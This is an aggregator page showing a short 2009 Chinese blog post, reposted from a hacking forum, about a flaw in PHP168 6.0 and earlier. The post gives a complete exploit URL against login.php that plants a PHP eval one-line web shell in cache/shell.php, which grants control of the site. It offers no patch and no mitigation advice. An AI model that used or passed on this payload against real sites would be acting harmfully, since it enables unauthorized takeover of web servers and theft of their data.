惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

A
About on SuperTechFans
Y
Y Combinator Blog
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
Microsoft Security Blog
Microsoft Security Blog
aimingoo的专栏
aimingoo的专栏
I
InfoQ
C
Check Point Blog
IT之家
IT之家
MyScale Blog
MyScale Blog
Apple Machine Learning Research
Apple Machine Learning Research
Vercel News
Vercel News
Last Week in AI
Last Week in AI
GbyAI
GbyAI
P
Proofpoint News Feed
量子位
Stack Overflow Blog
Stack Overflow Blog
Microsoft Azure Blog
Microsoft Azure Blog
月光博客
月光博客
阮一峰的网络日志
阮一峰的网络日志
人人都是产品经理
人人都是产品经理
B
Blog
T
The Blog of Author Tim Ferriss
H
Help Net Security
云风的 BLOG
云风的 BLOG

博客园 - Cookiss

自己骗自己 得到与失去 找不到解脱的方式 执着 蓉儿,对不起 思恋 尘埃 回忆 矛盾与否 你还是不知道 字母钢琴 安静地生活 网站不再安全的7大因素 wuyu Hk喜欢的浏览器 后海一夜 Back home 人生之路 题目--看你[老子]会转弯卜
PHP168 6.0及以下版本漏洞
Cookiss · 2009-09-18 · via 博客园 - Cookiss

最近在研究PHP
那个劲啊,就甭提鸟
———————————
本文引自黑客动画吧

危险等级:高

影响版本:PHP168 6.0以下版本

入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。

出问题的文件
login.php

login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<?php%20@eval($_POST[a]);?>

写到:cache/shell.php

———————————

posted @ 2009-09-18 15:03  Cookiss  阅读(535)  评论(1)    收藏  举报